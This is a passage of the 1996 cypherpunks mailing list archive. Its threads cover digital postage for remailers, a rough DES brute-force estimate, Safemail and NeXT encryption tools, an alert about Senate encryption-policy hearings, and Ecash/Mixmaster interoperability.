some charging postage (with subcategories of some giving the postage to the
recipient and some keeping the postage for themselves), who would use the
postage variant?

(This is a recurring situation where some services are free and some are
not. I fully realize that some paid services prosper (duh!, as we still
have thriving economies) even where free alternatives exist. That the
various newspapers continue to sell, or that premium t.v. channels on cable
thrive, when "free" alternatives exist is just one example. How paid
remailers would compete with free remailers is a topic we've written much
about.)

* the "cost" of remailing is not borne by the recipient, in the current
situation, so why should a "remailer gets postage" system have advantages?

* a recipient may "demand" payment for remailed messages, e.g., by adopting
a policy of saying "Unless I find 37 digicents per 10KB of size, I will
dump the message...so if you want to reach me, pay me." This "works" by the
simple expedient of being a demand that is adhered to. (In this case, the
recipient of a message is "selling" a commodity: access to him. The senders
of messages can either accept his terms or reject them.)

[Note: Current e-mail systems are not very market-based. Metering is almost
nonexistent, and it's as if anyone could mail a ton or two of horse manure
to anyone for no cost. I expect this to eventually change, and one way it
could change is for mail clients to refuse to accept delivery unless
certain conditions were met (who the sender is, how much payment is
attached, etc.). The ontology of physical package and mail delivery systems
has some lessons, though not all translate easily into the Internet
domain.]

* but it seems to make little sense for a remailer, absent such a demanded
price, to give up his postage fee to a recipient!

I'm not saying such a system could not work, only that I would not expect a
free market ecology of remailers to evolve this as a stable evolutionary
strategy.

I would expect a more likely future stable strategy to include some
combination of payments demanded by remailers and some payment or the like
demanded by terminal recipients.


>All my complaints come from people who have received mail, never from
>people who have sent it.  So obviously the steps we take need to make
>recipients happier.  Paying them is one way to do it.

Not to be flippant, but the job of making recipients happier is probably
not ours. We don't know whether a digital dime will make them happier for
receiving a threat, or a flame, or a 10 MB coredump file. This is why it is
up to the recipient to set policies, prices, etc.

(Ditto for the remailers, as only they know how much it is worth to them to
remail a given message, depending on packet size, perceived risk to them,
etc.)

Again, I always enjoy gedankenexperiments about digital postage. But I am
chagrinned that nearly four years after the first remailers we are still
operating in thought experiment mode for the most part.

I believe this is because there really is very little market at this time
for anonymous remailings. Those who mostly use remailers appear to be
willing to use casual-grade remailers, with few of the real Chaumian
protections. And they are not very concerned about reliablity, cover
traffic, etc.

Digital postage would be a bothersome wrinkle and would be routed-around by
most.

Ergo, no commercial-grade remailers, no insistence on robustness and
reliability, no digital postage, and no interest by Microsoft!

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 21 Jun 1996 23:21:16 +0800
To: Michael Froomkin <s1113645@tesla.cc.uottawa.ca
Subject: Re: Federal Key Registration Agency
Message-ID: <199606210601.XAA03610@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:20 PM 6/20/96 -0400, Michael Froomkin wrote:
>I have seen the text of the speech.  The wire service accounts wildly,
>wildly exaggerate.  This is a non-story...except for AG Reno's assertion
>that it would take the government a year to break one DES message with a
>"supercomputer".  She presumably believes this.  We know the number for
>known plaintext attacks, but assuming you don't have a known plaintext,
>what's a more reasonable assumption? 

If done in parallel, on a dedicated, 200 MHz custom chip, my WAG says that 
such a chip could try, and statistically analyze the results of 10 million 
DES codes per second.   (it would do the decrypts on a number of parallel 
DES blocks, and look for typical ASCII code pattern probabilities, again all 
in parallel.)  A typical cracking system might have 100 boards of 100 such 
chips, or perhaps a 100 billion such decrypts per second.  Checking the 
keyspace would require 2**19 seconds, or about a half million seconds, or 6 
days.  Average decrypt, of course, in 3 days.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fredfjr@netserver.nti.net (Frederick H. Fisher, JR.)
Date: Fri, 21 Jun 1996 21:26:41 +0800
To: me@muddcs.cs.hmc.edu (Michael Elkins)
Subject: Re: where'd Bal's PKS go?
Message-ID: <1.5.4.32.19960621040145.00688c10@nti.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 10:24 AM 6/20/96 -0700, you wrote:
>Did it move?  I hadn't seen any announcement of this...

I just visited the site earlier tonight and it seemed to be working...it took me a couple of tries but I was  able to extract a key from there.

But just to make sure, the one I visited is at:

http://www-swiss.ai.mit.edu/~bal/pks-commands.html



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMcodwlzzEIlY82+tAQF/BQP9HrT1ThbfmxcTWHZ6V55eAqVJysC2g1yU
T2cCHvXGxYvCf7jU4YyJMUgNThCbIC/GIv6MZzZ4SPaej8jky5qs+KH6urDEXwXe
d2YBeXihOxQ/5lEBMgniB61DcPjvcK4nl8MhVsn+3r+/9c5/kfTNEXAMK820gIEc
94BO0/MFf0I=
=A1Um
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 22 Jun 1996 00:17:00 +0800
To: cypherpunks@toad.com
Subject: Bashing "Wired"
Message-ID: <adef87be0402100475e8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:08 PM 6/17/96, Mike McNally wrote:

>That reminds me.  As someone who hasn't yet given up on WiReD in disgust
>(instead, I get it and read it faithfully in disgust), I was particularly
>pissed-off at the latest "Kids Net Rights" issue.  Jonathan Katz
>huffs and puffs about how "nobody in the digital world" protests the
>idea of rating schemes to keep non-adults away from information, and
>indeed claims that "the digerati" (grrr) are pushing rating schemes with
>great gusto to save themselves from censorship.
>
>I guess by "nobody", he probably means "nobody who hangs out in the same
>trendy espresso bars as the WiReD trendmeisters".  I've seen plenty of
>invective directed at the concept of rating systems in general, from
>a variety of people including Tim May and li'l ol' me.  That's been here
>and on some various newsgroups.

Indeed, I have not only written _against_ such mandatory rating and
age-declaration schemes, I have also written about how such schemes may be
used counter to the intended purposes (e.g., the way LolitaWatch helps
connoisseurs of young girls locate targets).

I happened to pick up that issue of "Wired" today and skimmed it at the
bookstore. The same old points of view recycled, refried, retreaded, and
ready to be retired. I suspect that author didn't know about our criticisms
because we're not published in "Wired," nor in "Netly News" and other such
travesties. Most importantly, we're not journalists, "online activists," or
moonlighting science fiction writers, and so we don't count.

Nearly every issue of "Wired" has the usual columnists, the usual feature
writers, and the usual focus on _personalities_ over substance. (Who the
fuck cares that on a long drive through the desert Jean Louis Gassee opined
to a budding Hunter S. Thompson that "that makes my nipples hard"? I
stopped reading that issue of "Wired" when this shit bubbled up out of the
sewer.)

(I'd go back exclusively to "Scientific American," except they now charge
$4.95 for a much-thinner magazine than the old thick and meaty issues of
the 60s and 70s, where an issue sold for 60 cents, then 75 cents, then
$1.00, etc. Also, the old article format has been replaced by shorter,
flashier, more personality-oriented pieces. Still, better than the fluff of
"Wired," which is "tired.")

And notice that increasingly the "journalists" are the quoted thinkers and
strategists in important areas? Someone majors in English, starts writing
for "Netizen" or "HotWired," and the next thing you know they're debating
crypto policy with Conrad Burns and Dorothy Denning. We're in an age where
the medium truly is the message.

I do think "Wired" has a few good items, buried deeply in the muck. I
dislike their typography and color styles (but then, who doesn't?), but
mostly I dislike their hipper-than-thou techno-freneticism. The hundreds of
little sound bytes about technolog, what's hot and what's not
(wired--tired), the focus on ephemeral personalities (a la "People," it's
true inspiration), well, it all makes me glad to never spend more than 15
minutes flipping through it at the newstand.

Someone told me recently that "Wired" is either already public, or is about
to go public (stock-wise), with an estimated market capitalization of $400
million. (I guess some of those journalists are suddenly very rich....)

Caveat emptor.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 22 Jun 1996 00:09:42 +0800
To: cypherpunks@toad.com
Subject: Re: NWLibs> Stop Cross-Copying (Re: Take the money, Harry, re.)
Message-ID: <adef8e3705021004fb39@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:21 AM 6/21/96, jim bell wrote:

>The subject was the use of digital cash for accepting Federal matching
>funds.  I cross-posted ONE message.  It was appropriately on-topic in both
>areas.
>
>Okay?

No, not okay.

The resulting torrent of messages from and to Tonie Nathan, and about Tonie
Nathan, had no connection to anything related to the CP list.

I didn't single you out as the instigator of the cross-copying, as I had no
idea of who it was.... (but now that I know it was you, I can't really say
I'm surprised).

When messages are cross-copied, warning should be included saying that the
message is going to more than one mailing list, and perhaps why this was
deemed necessary. And most importantly, urging follow-up posts to carefull
consider which groups are appropriate.

(Many people don't even bother to edit the To: and Cc: fields, resulting in
a pile-up of copied names. I try to excise out all recipients except
"cypherpunks@toad.com," figuring anyone not reading the list is not worth
sending a separate copy to.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Fri, 21 Jun 1996 16:36:10 +0800
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: Safemail
Message-ID: <199606210343.XAA10443@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 20 Jun 96 at 12:28, Andrew Loewenstern wrote:
[..]
> There are other, more serious, drawbacks to such a scheme though.  You can't  
> change your passphrase without changing your public key.  People can try to  
> guess your passphrase with only your public key.  Crack can guess peoples  
> account passwords something like 24% of the time.  I doubt the average joe  
> would use much better passphrases for their secret key.  That's a scary  
> thought!!  At least with PGP someone has to get a copy of the encrypted  
> secret key first.

You could require *very good* passphrases.

Rather than changing a passphrase, revoke the key. Perhaps expire 
keys after a certain period of time.

Longer lasting keys (such as a digital timestamp service) would save 
private keys with a protected password instead.

 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Intense <exalt@miworld.net>
Date: Fri, 21 Jun 1996 21:27:58 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Current status of RSA patent...
In-Reply-To: <199606210424.VAA28110@mail.pacifier.com>
Message-ID: <Pine.LNX.3.91.960621003157.2092D-100000@invictor.miworld.net>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 20 Jun 1996, jim bell wrote:

> At 05:32 PM 6/20/96 -0400, Intense wrote:
> 
> Yes, it's true.  I happen to believe that the only purpose the government 
> had in granting patents on public key and RSA is to help keep it from the 
> public.  They did a fair job, but the patents expire in 1-4 years and it'll 
> be too late by then.  Their attempts to foist the Clipper standard on us 
> didn't work.

Tho, I do belive, that the goverment wil never stop in it's quest to own 
its citizens.   This is changing the subject to much so i wont write on 
it...  :)

anyway..; 

Matt


               *          <exalt@miworld.net>           *







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Fri, 21 Jun 1996 16:22:39 +0800
To: cypherpunks@toad.com
Subject: The Rise of the Virtual State
Message-ID: <199606210056.AAA26214@pipe1.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Foreign Affairs, July/August, 1996. 
 
   "The Rise of the Virtual State" [Excerpts] 
 
      Richard Rosecrance, UCLA Professor of Political Science 
 
 
   Amid the supposed clamor of contending cultures and 
   civilizations, a new reality is emerging. The nation-state 
   is becoming a tighter, more vigorous unit capable of 
   sustaining the pressures of worldwide competition. 
   Developed states are putting aside military, political, and 
   territorial ambitions as they struggle not for cultural 
   dominance but for a greater share of world output. 
   Countries are not uniting as civilizations and girding for 
   conflict with one another. Instead, they are downsizing -- 
   in function if not in geographic form. Today and for the 
   foreseeable future, the only international civilization 
   worthy of the name is the governing economic culture of the 
   world market. 
 
   Timeworn methods of augmenting national power and wealth 
   are no longer effective. Like the headquarters of a virtual 
   corporation, the virtual state determines overall strategy 
   and invests in its people rather than amassing expensive 
   production capacity. It contracts out other functions to 
   states that specialize in or need them. Imperial Great  
   Britain may have been the model for the nineteenth century, 
   but Hong Kong will be the model for the 21st. 
 
   As a result of these trends, the world may increasingly 
   become divided into "head" and "body" nations, or nations 
   representing some combination of those two functions. 
   The world is embarked on a progressive emancipation from 
   land as a determinant of production and power. 
 
   Diminishing their command of real estate and productive 
   assets, nations are downsizing, in functional if not in 
   geographic terms. Small nations have attained peak 
   efficiency and competitiveness, and even large nations have 
   begun to think small. If durable access to assets elsewhere 
   can be assured, the need to physically possess them 
   diminishes. 
 
   The virtual state is an agile entity operating in twin 
   jurisdictions: abroad and at home. It is as prepared to 
   mine gains overseas as in the domestic economy. But in 
   large countries, internationalization operates 
   differentially. Political and economic decision-makers have 
   begun to recast their horizons, but middle managers and 
   workers lag behind. They expect too much and give and learn 
   too little. That is why the dawn of the virtual state must 
   also be the sunrise of international education and 
   training. The virtual state cannot satisfy all its 
   citizens. The possibility of commanding economic power in 
   the sense of effective state control has greatly declined. 
   Displaced workers and businesspeople must be willing to 
   look abroad for opportunities. In the United States, they 
   can do this only if American education prepares the way. 
 
   ---------- 
 
   http://pwp.usa.pipeline.com/~jya/vstate.txt   (39 kb) 
 
   VST_ate 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Fri, 21 Jun 1996 21:49:34 +0800
To: cypherpunks@toad.com
Subject: Backdoors (was Re: Current status of RSA patent...)
Message-ID: <199606210523.BAA12172@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 20 Jun 96 at 17:32, Intense wrote:

> That is probably true...  But, i am sure that goverment is going to want 
> to keep there [sic] backdoors, they have showed no interest in
  ^^^^^^^^^^^^^^^^^^^^
> it's [sic] citizens priviciy [sic] as of yet...  and i doubt they have changed... 

Please elaborate on what backdoors the government already has that it 
wants to keep.

Rob.
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Voters Telecommunications Watch <shabbir@vtw.org>
Date: Fri, 21 Jun 1996 21:44:54 +0800
To: cypherpunks@toad.com
Subject: ALERT: Crypto hearings in D.C. 6/26/96, submit your comments through WWW!
Message-ID: <199606210520.BAA19235@panix3.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


=============================================================================
          ____                  _              _   _
         / ___|_ __ _   _ _ __ | |_ ___       | \ | | _____      _____
        | |   | '__| | | | '_ \| __/ _ \ _____|  \| |/ _ \ \ /\ / / __|
        | |___| |  | |_| | |_) | || (_) |_____| |\  |  __/\ V  V /\__ \
         \____|_|   \__, | .__/ \__\___/      |_| \_|\___| \_/\_/ |___/
                    |___/|_|

           SECOND SET OF CRYPTO HEARINGS (S.1726) SET FOR 6/26/96 IN
        WASHINGTON D.C.  IF YOU CAN'T BE THERE, YOU CAN STILL HAVE YOUR
              COMMENTS ENTERED INTO THE RECORD AT WWW.CRYPTO.COM

                              Date: June 21, 1996

         URL:http://www.crypto.com/            crypto-news@panix.com
           If you redistribute this, please do so in its entirety,
                         with the banner intact.
-----------------------------------------------------------------------------
Table of Contents
        News
        How to receive crypto-news
        Security And Freedom through Encryption forum: July 1, 1996
        Press contacts

-----------------------------------------------------------------------------
NEWS

The sponsors of the Pro-CODE bill (S.1726) will hold the second of
two hearings on the encryption issue in Washington D.C. this coming
Wednesday, June 26.  Witnesses scheduled to testify at the hearing, which
will focus on the Burns/Leahy Pro-CODE bill (S. 1726) include:

* Phil Zimmermann, Inventor of PGP
* Whit Diffie, Father of Public-Key Cryptography
* Jerry Berman, Executive Director, Center for Democracy and Technology
* Matt Blaze, Cryptographer
* Phil Karn, Cryptographer
* Barbara Simons, Chair of US Public Policy Committee, ACM
* Marc Rotenberg, Director, Electronic Privacy Information Center
* AND YOU!! (See below for details)

The hearing will focus on the need to reform US encryption policies,
proposals to relax export controls on encryption, and the privacy issues
raised by the current policy.

Senator Burns (R-MT), Senator Leahy (D-VT) and the other sponsors of the
Pro-CODE bill want to hear from the Net.community about why encryption is
important to privacy and security on the Internet.

If you're like most of American, you cannot take a day off just to attend
the hearings to make your voice heard.  Luckily, you can use the
handy World Wide Web form to express your opinion and have it entered
into the record.

Please be sure to visit http://www.crypto.com/ and add your voice to the
debate over encryption policy on Capitol Hill.  Responses will be tabulated
and the results, along with selected statements, will be included in the
Congressional Record by Senator Conrad Burns.  The results will also be
featured during the Security and Freedom through Encryption Forum (SAFE) on
July 1 (details on that event are attached below).  If you find the WWW
form too constraining, or you do not have access to the World Wide Web,
send your testimony to Shabbir J. Safdar (shabbir@panix.com) who will
make sure it gets into the record.

To add your voice to the crypto debate in Congress, visit:

   http://www.crypto.com/

-----------------------------------------------------------------------------
ATTEND THE SAFE FORUM - JULY 1, 1996 STANFORD CALIFORNIA

On July 1, 1996, in the heart of California's Silicon Valley at Stanford
University, members of Congress, prominent computer industry leaders and
privacy advocates will meet to discuss the need to reform U.S. encryption
policy.

The event is FREE and open to the public, but space is limited and is going
fast.  To find out more, and to reserve your free ticket, visit the SAFE
Forum Web Page at:

  http://www.crypto.com/safe

CONFIRMED SPEAKERS INCLUDE:

Among other prominent industry leaders, cryptographers, privacy advocates
and members of Congress, confirmed speakers include"

Industry Leaders and Cryptographers        Members of Congress

* Marc Andreeson, Netscape                 * Rep. Anna Eshoo (D-CA)
* Jim Bidzos, RSA                          * Rep. Tom Campbell (R-CA)
* Eric Schmidt, Sun Microsystems           * Rep. Zoe Lofgren (D-CA)
* Brad Silverberg, Microsoft               * Sen. Conrad Burns (R-MT)
* Phil Zimmermann, PGP Inc                   * Sen. Patrick Leahy (D-VT)
* Matt Blaze, AT&T                         * Sen. Larry Pressler (R-SD)
* Bruce Schneier, Counterpane Systems

Privacy Advocates and Legal Experts:

* Michael Froomkin, U. of Miami Law School
* Jerry Berman, Center for Democracy and Technology
* Grover Norquist, Americans for Tax Reform (invited)
* Ken Dam, U. of Chicago Law School (invited)

This event will be "cybercast", with full audio and still video clips,
live online with the help of MediaCast.  Details on the cybercast are
available at http://www.crypto.com/safe/

SAFE FORUM SPONSORS

This important discussion on the need for an alterative policy to protect
privacy and security and promote commerce on the Global Information
Infrastructure is being made possible by the generous support of the
following companies and public interest organizations:

America Online
Americans for Tax Reform
AT&T
Business Software Alliance
Center for Democracy and Technology
Center for National Security Studies
Commercial Internet eXchange
CompuServe Incorporated
Computer Professionals for Social Responsibility
Cylink Corporation
EDS
Electronic Frontier Foundation
Electronic Messaging Association
Electronic Privacy Information Center
Information Technology Association of America
IEEE - USA
MediaCast
Media Institute
Microsoft Corporation
Netcom Online Communication Services
Netscape Communications Corporation
Novell, Inc.
Oracle Corporation
Pacific Telesis
PGP Inc.
Prodigy, Inc.
Progress and Freedom Foundation
Securities Industry Association
Software Publishers Association
Sybase, Inc.
Voters Telecommunications Watch
Wired Magazine

Please visit the SAFE Forum Home Page for more information
(http://www.crypto.com/safe/)

-----------------------------------------------------------------------------
HOW TO RECEIVE CRYPTO-NEWS

To subscribe to crypto-news, sign up from our WWW page (http://www.crypto.com)
or send mail to majordomo@panix.com with "subscribe crypto-news" in the body
of the message.
-----------------------------------------------------------------------------
PRESS CONTACT INFORMATION

Press inquiries on Crypto-News should be directed to
	Shabbir J. Safdar (VTW) at +1.718.596.2851 or shabbir@vtw.org
	Jonah Seiger (CDT) at +1.202.637.9800 or jseiger@cdt.org

-----------------------------------------------------------------------------
End crypto-news
=============================================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Fri, 21 Jun 1996 22:10:23 +0800
To: mccoy@communities.com (Jim McCoy)
Subject: Re:Oil Change software snoops through hard drive
Message-ID: <199606210528.BAA12254@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 20 Jun 96 at 14:42, Jim McCoy wrote:

[Stuff about trojans deleted]

To heck with trojans... how does it know what version of NiftyMail 
you are using?  So what if you make up a dummy directory and dummy 
files with proper CRCs for NiftyMail v2.0, so Oil Change upgrades you 
to a real version of NiftyMail v2.1.  Gives a whole new avenue for 
software piracy here...

...Or does it keep a central database of registered NiftyMail users?
Does it pass along things like serial numbers embedded in software?

And is info on who owns what software kept private? Or will you be 
spammed/junk-mailed direct marketing info?

Yes. Many questions.

Rob.

---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Fri, 21 Jun 1996 23:37:13 +0800
To: adam@homeport.org>
Subject: Re: Safemail
In-Reply-To: <199606201529.KAA02594@homeport.org>
Message-ID: <glmX7oe00YUyR6Qn9w@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 20-Jun-96 Re: Safemail by Adam
Shostack@homeport.o 
> Not to defend the safemail folks, but this does remind me of something
> that NeXT did with Eliptic curve based systems; there was no storage
> of the private key, it was generated from the passphrase at run time.
> It was a side discussion, maybe with Andrew Lorenstien?  Andrew?

Might you be thinking of ForYourEyesOnly, by R. Crandall and J. Martin?

It was distributed as a demo program with Release 2 of the NeXTstep
operating system, along with such nifty apps as a Mandelbrot generator
that used the 56001 onboard DSP. (I've never used it, though.)

Here's the help file that comes with ForYourEyesOnly. I had to grab it
with SegHoarker.

-Declan (Registered NeXT Developer)

---

General
ForYourEyesOnly is a message encryption utility.  The basic idea is that
secret messages may be sent via mail, or simply stored as encrypted
(.encr) files.  The notion of Public Key encryption requires that each
participant have a pair of keys: a "Private Key" and an associated
"Public Key."  Everyone's Public Key is known to everyone (hence the
name public).  Private Keys on the other hand are just like passwords;
that is, you commit your Private Key to memory.

Keys
You create your Public Key via the Registration... menu item.  When your
(at least 8-character) Private Key is entered, the associated Public Key
is computed for you.  Again, note that the Public Key is safe, i.e. it
can be broadcast to the whole world.  Your Private Key, on the other
hand, should never be disclosed beyond your chosen group of confidantes
(which group can of course be just a singleton--you).

ForYourEyesOnly allows for groups (larger than just yourself) to share a
Private/Public Key pair.  For example, a sales department can have one
common Private Key, so that any member of sales may read mail that was
encrypted using the associated Public Key for sales.  In this "group"
mode, a new sales member is presumably given the Private Key verbally,
on a garden walk, or during a loud evening at a local tavern, etc.

Decryption
The decryption procedure is dealt with first in case you have just
received an encrypted document and don't know what to do with it.  If
this is the case you may, for example, have double clicked a .encr file
icon from mail and have landed here.  By entering a correct Private Key
in the Message Window and pressing the Decrypt button you will obtain a
decrypted file.

You might wonder how someone could have sent you an encryption if you
have not yet registered a Private Key.
Well, you might just have joined a department all of whose workers are
using a single Private/Public Key pair for intra-office mail.  In this
case, all you need do is find the departmental Private Key for
decryption.
    
The .encr icons can be dragged to/from Mail or to/from Browser.

Encrypting files
A Plaintext message may be encrypted by entering the recipient's Public
Key (if it has not already appeared automatically, as it does when the
recipient initiated a mail exchange), and your own Private Key, then
pressing the Encrypt button.  (As above, a Public Key must have been
obtained at some point in the past via the Registration menu item). Note
that "Plaintext" is actually a theoretical term from encryption theory,
and means the original, understandable text.  What you can actually
send, though, is text and/or pictures, etc., much the same way that you
can mail multimedia files.  We call all of this Plaintext, and the
encryption algorithm chews up everything you are sending in order to
create the .encr file.
(NOTE: You can encrypt any kind of file, but at this Release you cannot
send directories (folders)).  

The encrypted file icon will appear in the icon well at the top of the
message window and can be dragged to the file browser or another
application.  The encrypted message can also be sent via the Services
menu by selecting the Mail menu and the Document menu item under that. 
A file can also be encrypted and saved to disk in a place you specify by
selecting the Encrypt, then Save As... menu item under the Document menu.

Instant Rebounding
Note that ForYourEyesOnly automatically transmits the Public Key of the
sender along with the message itself.  Thus, when you decrypt a mail
message you will get an automatic display of the other party's Public
Key.  This convenience means that once you have decrypted the incoming
message, you can easily "rebound", that is shoot a message back, simply
by editing the Plaintext area and hitting the Encrypt button.  This
instant rebounding works because both necessary keys are properly in
place as soon as you decrypt.   

Importing files
Files can be dragged in from the browser to the content of the message
window, or selected using the Import File... menu item in the Document
menu.

Exporting files
Files in a received Plaintext message can be exported by dragging them
from the message window content or by double clicking them to launch the
appropriate application.

Our proprietary algorithm
One enjoyable aspect of working on encryption algorithms is that Help
information pertaining to the algorithm itself should be vacuous; i.e.,
the less said, the better.  Just one remark: the algorithm uses number
theory but, in not using factorization, is distinct from the celebrated
RSA method.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Fri, 21 Jun 1996 23:01:39 +0800
To: alano@teleport.com>
Subject: Re: Congress is at it again
In-Reply-To: <2.2.32.19960620173912.00cde130@mail.teleport.com>
Message-ID: <QlmX_O_00YUyJ6QpB=@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 20-Jun-96 Re: Congress is at it
again by Alan Olsen@teleport.com 
> At 08:23 AM 6/20/96 -0400, you wrote:
> >There's no imminent Congressinal action here, folks. Note that HR2441
> >may be revived next year, but we have a reprieve for now.
>  
> I hate to be cynical, but I seem to remember the same thing being said about
> the CDA and the Digital Telephony bills.
>  
> Things have a strange habit of getting snuck through at the last moment...

Hey, I'm cynical too. But I'm also a realist.

If the bill starts showing any signs of life, I'll be the first one
covering it and pushing the sucker back in its grave unless it's changed
radically. But right now it's a fetid rotting carcass, and ain't going
nowhere.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Fri, 21 Jun 1996 22:49:23 +0800
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: Safemail
In-Reply-To: <199606201529.KAA02594@homeport.org>
Message-ID: <YlmXHtG00YUyF6QrYK@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


And more generally, this is what NeXT's developer documentation has to
say about services... Good stuff.

-Declan

----

Examples of a Few Possible Services

Here are a few examples of services that have already been implemented
to give you an idea of what can be done with NeXTSTEP's services
mechanism:

* Encryption
An encryption service can convert data to a more secure form.  For
example, Mail can place a mail message on the pasteboard as a standard
Rich Text Format (RTF) document, and another application could encrypt
the document and place it back into mail as unreadable ASCII text, or as
a document to be opened only by another external decryption application.



Excerpts from internet.cypherpunks: 20-Jun-96 Re: Safemail by Andrew
Loewenstern@il.us 
> One interesting thing about NeXT's software is that the Mail
application has  
>  
> crypto hooks.  The crypto code is in a drop-in bundle that extends the app  
> at runtime.  This isn't just a generic interface, but the internationally  
> shipped Mail software calls methods in the external bundle that are  
> definitely crypto related.  Also, much of the crypto and key
management user  
>  
> interface ships with the main Mail package.  It is hidden without the
crypto  
>  
> bundle, but if you peek around with InterfaceBuilder you can see that it is  
> there.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 22 Jun 1996 05:48:51 +0800
To: cypherpunks@toad.com
Subject: Re: Recipients get the postage
Message-ID: <v02120d78adf01a8ebfbd@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 22:27 6/20/96, Timothy C. May wrote:

>Again, I always enjoy gedankenexperiments about digital postage. But I am
>chagrinned that nearly four years after the first remailers we are still
>operating in thought experiment mode for the most part.
>
>I believe this is because there really is very little market at this time
>for anonymous remailings. Those who mostly use remailers appear to be
>willing to use casual-grade remailers, with few of the real Chaumian
>protections. And they are not very concerned about reliablity, cover
>traffic, etc.

While it is true that there is a relatively small market for remailers and
therefore insufficient incentive to spend great efforts on developing
for-pay remailers, there is a relatively simple technical modification to
Ecash that might lower the development barrier to a level at which for-pay
remailers may be deployed.

Clearly, the task of designing a new remailer architecture as well as a
payment system suitable for use in such an architecture is prohibitive at
the current market size. If currently deployed remailer and payment systems
could be modified to interoperate, developing for-pay remailers would be
considerably easier.

Unfortunately, there are technical reasons that have kept the two main
contenders for building such a hybrid system, Mixmaster and Ecash, from
interoperating in a smooth fashion.

Mixmaster has certain constraints on the maximum number of bytes a
potential payment sting can have. [Note: the constraint is in the Mixmaster
header, it has nothing to do with total message size].

To stay within that limit, the client used to access the Ecash wallet would
have to be able to specify the exact denominations of coins to be used to
make a payment of a given amount. Neither DigiCash's current Ecash client,
nor the recently released official Ecash API allow for this level of
control over the composition of a payment.

When there is a fully working implementation of Ecash that allows the
detailed control required to create payment messages that Mixmaster can
incorporate in its messages, implementing for-pay remailers should be
trivial.

It is difficult to predict at this time if such out of the box for-pay
remailer will be commercially viable



-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
